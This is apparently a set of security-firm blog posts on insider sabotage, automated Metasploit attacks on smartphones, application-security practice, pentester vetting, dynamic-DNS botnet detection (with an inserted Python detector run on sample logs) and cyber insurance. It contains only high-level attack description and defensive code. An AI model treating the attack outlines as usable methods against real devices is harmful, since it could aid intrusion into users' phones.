In many discussions about insider threats I've referred to the San Francisco IT administrator charged with holding the city's network hostage. In that case he didn't give the administrative credentials back to his employer, but he kept the systems operational. It was a good example, but it is now a bit dated (2008), and it was only a matter of time before another one emerged. With a roar, it did. An IT administrator recently pleaded guilty to crippling his former employer's network. Some have dubbed this a "hacking spree," but I would like to differentiate it: this was not a hack, but an individual with elevated privileges who became so disgruntled that he lashed out. When he did so, he didn't use specialized hacking tools or techniques; instead he used a common administrative tool to delete critical IT systems, causing in excess of $800,000 in damages according to court documents. What makes this example worse is that this individual resigned before the attack, but the organization kept him on as a consultant "due to his extensive knowledge of the company's network." He performed his attacks with valid user credentials and common support tools.

Why am I trying to draw such a distinction about whether this is hacking or not? When discussing risks, whether as part of your normal risk assessments, your Risk Management Program or elsewhere, I think it is important to draw the distinction as it relates to policies and implementable controls.
There is usually a lot of effort put into protecting against malicious and unauthorized attacks (i.e., hacking) compared to disgruntled individuals with elevated privileges. Malicious? Yes. Unauthorized? No. That's the scary part, and the one that needs to be addressed by each and every organization. The takeaway here is to ensure that segregation of duties is followed so that no one person has the keys to the kingdom, that privileged credentials are revoked the moment a role ends, and that disgruntled employees are not retained where they can cause extensive damage to the organization.

(Post title: Insider Threats. Last modified 2021-04-13.)

(Next post, published 2010-12-30.)

Does your phone have a firewall? Does it have antivirus? Should it? I'll wager your laptop does. That's because your laptop faces the looming threat of attackers from the internet every time it connects to a network. Additionally, any time you use a network, you expose yourself to the potential for a network-level attack. Everyone knows that an unprotected computer is pwnage waiting to happen. So what about your phone?

Your phone is connected to the internet 24/7. What's more, it lacks a lot of the controls that would normally be applied to a networked computing device. It has no firewall, no antivirus, and most users can't even kill processes or modify the filesystem without voiding their warranty. The user has to rely on the closed nature of the device and hope there are no exploits roaming in the wild.
This is paper-thin security at best, especially when you consider that trends in modern phone usage are pushing for more devices containing more sensitive data.

So how does an attacker target a mobile device? They don't have to: given some recent developments in the Metasploit framework, they can initiate wide-ranging automated attacks against anyone they can connect to. Consider the open Wi-Fi network at a coffee shop. As customers sit down and link up laptops and phones, an attacker keeps track of hosts joining the network. Then, leveraging the autopwn feature of Metasploit, the attacker can attempt any number of exploits against any number of hosts, smartphone or not. Your laptop might withstand automated attacks because it has a firewall and antivirus. Your phone doesn't. There is no "Do you want to allow this app to run?" There is no "Would you like Windows Firewall to allow access to this program?" That's it. An attacker now has access to your phone's audio, camera and data, and to any stored credentials or other sensitive data. Metasploit has payloads in development for both the iPhone and Android platforms that will give root access to the phone, pending a successful exploit. Finding more exploits is only a matter of time. So this brings me to my point: should your phone have a firewall?
(Post title: In Which a Smartphone is Pwnt, Thoroughly and Without Reason. Last modified 2021-04-13.)

(Next post, published 2010-01-07.)

Application security attacks are increasing

According to Gartner, 75% of attacks come through web applications rather than through the network. This means greater emphasis needs to be placed on application security. However, this does not appear to be happening.

Application security vulnerabilities are increasing

For the first half of 2009, Cenzic identified about 3,100 total vulnerabilities, an increase of over 10 percent from the second half of 2008 (https://www.cenzic.com). Another revealing piece of data: WhiteHat Security has stated that 83% of the 1,300 websites they scan have had at least one serious vulnerability (https://www.whitehatsec.com). Of the projects NetSPI has done in the application security area, 83% also had serious findings (serious vulnerabilities being those of HIGH, CRITICAL or URGENT severity as defined by PCI DSS naming conventions).

What can happen if you do not fix the problems?

The first real risk is theft of your data or your customers' data. If an application is not written correctly, SQL injection can give a person (or persons) access to your database. Think of TJX and all the problems they had. Another risk is to your company's reputation. Given the right situation, a user could be redirected to a site that is not under your control. It could be a porn site, or a site that looks like yours but exists only to steal your users' credentials. Your reputation will take years to repair, and the cost to your company may be insurmountable.

What can you do?

Many of the problems can be fixed by training. This doesn't have to mean external training courses; it could be brown-bag lunches that cover specific secure coding techniques. A good place to start is the OWASP website (https://www.owasp.org). This site gives good information on detecting and preventing these vulnerabilities.

Perform code reviews and application vulnerability assessments on a regular basis. Code reviews need to be performed every time the code changes. Application vulnerability assessments need to be done at least annually, and again whenever the application changes significantly.

By doing code reviews, and vulnerability assessments, you are helping both your company and your customers.

End of post: What's Happening in the Application Security Arena?

Next post (published 2009-11-16):

Let's talk about application vulnerability assessments, penetration testing, and code reviews. How effective they are depends on a number of factors: the education and experience of the testers, the tools used, the restrictions placed on the testers, and even the environment in which the testing is done. This post focuses on the education and experience of the testers.

Consider the well-known recent case of the Heartland breach. Robert O. Carr, Chairman and CEO of Heartland Payment Systems, was quoted as saying the following: "In early 2008 we hired a QSA to perform a penetration test which found nothing. On April 30, 2008, we were deemed PCI-compliant" (https://www.infosecurity-us.com/view/4562/qsa-system-is-broken-says-heartland-ceo/).

I wonder whether Heartland Payment Systems asked the QSA company about the background of the penetration tester. Yes, the company was QSA-certified, but did the person or persons actually performing the penetration test have the education and experience needed to do it well? Not everyone does. The same goes for application vulnerability assessments and code reviews. Just because you hire a company that sells itself as having experts on staff does not mean you get the top dog, or even the middle dog. You might be getting a puppy. On the other hand, if the company performing the testing uses a team approach, the team's collective knowledge might be as good as or better than that of the top dog.

Find out who will be performing your tests and get their resumes, or at least ask about their backgrounds. What training and experience do they have in this area? Are they right out of school, or do they have at least a couple of years of experience? Does the firm employ a team of specialists? Is its work process mature and well defined?

These are not hard questions to ask or to answer. Making this small effort could make a big difference in the effectiveness of your application security assessments and in your organization's overall information security.

End of post: How Good Are Your Application Security Assessments?

Next post (published 2009-10-20):

The Internet is a vast and unforgiving wilderness; every day some new monstrous beast rears its ugly head and threatens the hapless denizens of networks everywhere. The only thing standing between those Internet citizens and complete ownage is the security industry, which means we have to adapt to the newest and biggest threats on the Internet. Recently, the industry has shown its vulnerability to a particularly nasty threat: botnets. This malware is dangerous because it is difficult to detect before infected workstations start broadcasting administrator passwords, online credentials, or even credit card and Social Security numbers. What's more, botnets can adapt to hide from common detection techniques and antivirus configurations. Prevention is, of course, the best answer, but it can't be the only line of defense. Pfizer lost some serious credibility when its networks started uncontrollably spamming people with offers for Viagra (a product it makes), and as recently as September it was revealed that over half of the Fortune 100 had networks infected with a botnet called Mariposa. The problem isn't a simple one.

More recent approaches to botnet detection are network-based. Many botnets rely on dynamic DNS services to obscure their command-and-control and data collection servers, and David Dagon wrote an interesting presentation on DNS-based detection of forming botnets. Dynamic DNS services tend to be abused by botnet owners, who obtain hundreds of third-level names under dynamic DNS zones for use in controlling botnets or aggregating data. Fortunately, this means a botnet generates a lot of DNS traffic while it is forming: every newly infected host resolves the same rendezvous names within a short time, and a single bot cycles through many names as it hunts for a live controller. That footprint makes it easy to isolate the infected hosts before they transform into a rampaging swarm of zerglings and spew your data all across the Internet. It won't save anyone from an already formed botnet, and it won't prevent a distributed denial of service attack that originates externally, but it's another layer of protection for internal data.
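The DNS footprint described above, turned into detection logic as an added example (this is not code from the original post or from Dagon's work). It runs two checks over resolver query logs: names under watched dynamic-DNS zones that are resolved by many distinct clients within one window (the rendezvous burst of a forming botnet), and clients that resolve many distinct dynamic-DNS names within one window (a bot walking its controller list). The zone list, the log format, the sample log lines and the thresholds are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Dynamic-DNS zones to watch. Hypothetical names chosen for this example; in
# practice the list comes from your own resolver data or threat intelligence.
DYNAMIC_DNS_ZONES = ("dyn.example.net", "ddns.example.org")

# Constructed resolver query log: "<ISO timestamp> <client IP> <queried name>".
SAMPLE_LOG = """\
2009-10-20T08:00:01 10.0.0.11 www.example.com
2009-10-20T08:00:05 10.0.0.12 rally1.dyn.example.net
2009-10-20T08:00:09 10.0.0.13 rally1.dyn.example.net
2009-10-20T08:00:14 10.0.0.14 rally1.dyn.example.net
2009-10-20T08:00:20 10.0.0.15 mail.example.com
2009-10-20T08:01:02 10.0.0.12 rally2.ddns.example.org
2009-10-20T08:01:40 10.0.0.12 drop7.dyn.example.net
2009-10-20T08:02:15 10.0.0.12 cc-bk.ddns.example.org
2009-10-20T08:45:00 10.0.0.20 home-nas.dyn.example.net
2009-10-20T09:30:00 10.0.0.21 home-nas.dyn.example.net
"""


def parse_log(text):
    """Parse log lines into (timestamp, client, name) tuples with normalised names."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, name = line.split()
        records.append((datetime.fromisoformat(ts), client, name.lower().rstrip(".")))
    return records


def dynamic_zone(name):
    """Return the watched zone that `name` is a subdomain of, or None."""
    for zone in DYNAMIC_DNS_ZONES:
        if name.endswith("." + zone):
            return zone
    return None


def _burst(hits, window, threshold):
    """Sorted distinct values seen in some `window` starting at a hit, once >= threshold."""
    hits.sort()
    for i, (start, _) in enumerate(hits):
        seen = {value for t, value in hits[i:] if t - start <= window}
        if len(seen) >= threshold:
            return sorted(seen)
    return None


def rendezvous_bursts(records, window=timedelta(minutes=5), min_clients=3):
    """Dynamic-DNS names resolved by many distinct clients in a short window.

    A freshly formed botnet has every bot resolve the same rendezvous name at
    roughly the same time, so the name shows a burst of distinct clients.
    """
    by_name = defaultdict(list)
    for ts, client, name in records:
        if dynamic_zone(name):
            by_name[name].append((ts, client))
    flagged = {}
    for name, hits in by_name.items():
        clients = _burst(hits, window, min_clients)
        if clients:
            flagged[name] = clients
    return flagged


def noisy_clients(records, window=timedelta(minutes=5), min_names=3):
    """Clients resolving many distinct dynamic-DNS names in a short window.

    A single bot cycling through its fallback controllers produces this
    pattern; a home user with one dynamic-DNS NAS does not.
    """
    by_client = defaultdict(list)
    for ts, client, name in records:
        if dynamic_zone(name):
            by_client[client].append((ts, name))
    flagged = {}
    for client, hits in by_client.items():
        names = _burst(hits, window, min_names)
        if names:
            flagged[client] = names
    return flagged


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("rendezvous names:", rendezvous_bursts(recs))
    print("noisy clients:", noisy_clients(recs))
```

On the sample log the two legitimate lookups of home-nas.dyn.example.net, 45 minutes apart, stay below both thresholds, while rally1 is flagged as a rendezvous name and 10.0.0.12 as a host walking a controller list. Treat the output as a triage list rather than a blocklist: the thresholds are arbitrary, the zone list has to be maintained, and, as the post says, this catches a botnet while it forms and does nothing for one that is already established.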

End of post: Botnet Detection and Dynamic DNS

Next post (published 2022-08-09):

It’s no secret that data breaches are costly. IBM’s annual Cost of a Data Breach report illustrates this well:  

  • The average cost of a data breach in 2021 was $4.35 million. 
  • The average cost of a ransomware attack, not including the cost of the ransom, was $4.54 million in 2021.
  • In 60 percent of organizations, the breach led to price increases passed on to customers.

Given the significant costs associated with data breaches, organizations are increasingly looking to cyber insurance to help protect their businesses against financial losses from a cyber attack. In fact, in IBM’s report, “insurance protection” was a key factor that lowered the average total cost of a data breach.  

Yet, cybersecurity insurance is still considered an emerging space, one that is notoriously difficult to navigate. 

For insights on the topic, we recently sat down with industry experts Ethan Harrington, Founder and Principal at 221b Consulting, and Mary Roop, Consultant at 221b Consulting, to discuss the current state of cyber insurance and get answers to some of our burning questions. Continue reading for highlights from the discussion.

What’s going on in the cyber insurance market? 

Ethan Harrington: The market is terrible, and many of the issues we've started to experience have surfaced just within the last few years. Last year was a historical year, and not for good reason. We saw a 300-plus percent increase in ransomware. We also saw our clients experience triple-digit increases in their cyber insurance premiums. 

On average, a company categorized as having "good" risk levels may see a 15 to 20 percent increase in premiums, and those at the "questionable" risk level or that have had claims experience may see another three-digit percentage increase. 

Why is this happening? Market corrections. The insurance marketplace is global, and all of these insurers are writing more than cyber coverage. When they have a year where auto liability coverage is bad, they're typically going to try to make up some of that premium in other places because they have to make money. In 2019 and during COVID-19, auto liability and general liability were extremely stressed, along with other claims completely unrelated to cyber. So, we knew that there was going to be a potential correction. 

But what we saw last year was a complete market shift. We’ve never seen anything like this before. We’re concerned that what we’re seeing right now is going to perpetuate for many more years and are unsure if coverages are ever going to return to what they were and how the associated premium will be impacted.  

As cyber insurance matures, is it becoming yet another regulation or standard to comply with? 

Ethan: Yes and no. Yes, because it is another party that is keenly interested in what organizations are doing to not only harden their defenses and protect their financials but also protect Personally Identifiable Information (PII) or data from a potential ransomware attack that could cause business interruption. 

No, because most insurance carriers understand that there are several golden standards to adhere to, whether it's the National Institute of Standards and Technology (NIST) or the International Organization for Standardization (ISO). If you can document that you follow one or a combination of them, then I think that most would understand it. 

Insurers are starting to layer on more requirements beyond what NIST or ISO would indicate as guidance – and they’re asking questions specific to CISOs. They're starting to ask questions about cyber resiliency. In general, most regulatory frameworks that organizations follow focus on preventative actions. Now, carriers are focusing on reactive responses to cyber attacks, looking at what you are doing to limit the potential impact if you do have to file a claim. 

There’s more scrutiny involved in cyber insurance today, and it's different from what other regulators require.  

Who typically manages the cyber insurance process? 

Webinar attendees, many of whom came from financial institutions, reported the following breakdown of who manages cyber insurance at their organizations:

  • 42% risk management  
  • 25% finance 
  • 25% information security  
  • 8% general counsel/legal 

Mary Roop: Whoever runs risk management typically controls the placement, but it truly is a partnership between the person responsible for placing the insurance policies, the information security team, the privacy team within legal, and the team responsible for Payment Card Industry (PCI) compliance.

These teams need to work together to ensure an understanding of the cyber hygiene and the data incident response within your organization. This creates a holistic picture with complete information useful in the robust cyber insurance application and underwriting process. 

How has ransomware played a role in the cyber insurance market?  

Ethan: Ransomware decimated the entire insurance industry from a cyber perspective. In 2021, there was a 300-plus percent increase in ransomware attacks. Ransomware used to be a quick way for adversaries to grab cash, but they've become more intelligent, conducting background checks into businesses to determine what their financials look like to identify the most realistic ransom amount to ask for. 

Ransomware is not going away anytime soon, and the cyber insurance market is responding to that. Now, we are starting to see sub-limits within insurance policies specific to ransomware, separate retentions as it applies to ransomware, and different changes in waiting periods (eight hours then vs. 24-48 hours now). But I expect that'll start to lessen, and some of those policies will return to what they were before. 

Want to improve your ransomware prevention and detection? Explore NetSPI’s ransomware attack simulation services. 

How have cybersecurity insurance questionnaires evolved? 

Ethan: 15 years ago, none of the insurers had any expertise in cybersecurity. Many insurance companies recognized that they do not understand cybersecurity and hired third parties to come in and ask the questions on their behalf.  

That has changed. Lots of insurance carriers are now hiring specific technical people that have been consultants in cyberspace or those who managed security service providers because they understand the market much better. Now, insurance companies are teaching them insurance and how to do underwriting versus outsourcing. 

How do you navigate situations where providers require specific vendors for your solutions and controls? 

Mary: If your cyber insurance carrier isn't already requesting this within the application, we do recommend getting pre-approval on your data incident providers. They may be included on that pre-approved list already, and if not, they're going to have to be vetted extensively by those providers.  

This process is lengthy, but it is important to undertake before starting your renewal strategy. Go meet up with your legal team to determine the outside counsel that you can use to help advocate for your vendor choices. Carriers want to understand vendor credibility if they're not familiar with them. 

Getting ahead of this process is important because you don't want any surprises when a data incident occurs. Like when your carrier says, "We're not going to approve this claim because you do not use an approved vendor." If you are proactive about this, you can go to the leaders of the respective departments and come up with a solution before it's too late. 

There has been talk about possibly monitoring clients’ cyber behavior and adjusting insurance premiums accordingly. How might we see a program like this play out? 

Ethan: We don't like insurance companies constantly monitoring and doing scans of environments. It looks bad for the insurance industry because we all know that there are going to be weaknesses that can be found if you look close enough.

If an insurance company is constantly scanning your system, it is possible that they're going to come back to you and say, “We need you to fix this.” At some point, the CISO is going to say, “I don't have any more risk management practices that I can apply to protect us against that.” Security teams can do everything they can, but if employees/personnel make a negligent mistake or are heavily targeted, they can cause a massive claim to occur. 

We’re putting the CISO in a difficult position where they’re trying to manage the board, protect their critical assets, and now all of a sudden, they also need to keep an insurance company happy.  

Some scans delve into the depths of systems to find vendors and clients that you've referenced and how they could affect your insurance. Underwriters, especially in financial services, are looking at the kind of brand reputation or loss of business income that might be impacted if there was a data security incident. It's becoming exceedingly difficult for underwriters to try to figure this out. 

Have you seen any companies go under because they've failed to secure cyber insurance due to poor IT security controls? 

Ethan: Thus far, no, I have not seen anybody that has actually gone under because they didn't buy cyber insurance. But I anticipate it is going to happen, especially with the triple-digit increases in premiums. 

We are seeing more and more companies that are not buying or cannot obtain cyber insurance, and it will come back to bite them in some capacity. It's likely that we will see organizations going under as a result of the rising financial costs associated with breaches today. 

For the full conversation and more in-depth insights from Ethan, Mary, and Norman, watch the on-demand webinar.

End of post: The Current State of Cyber Insurance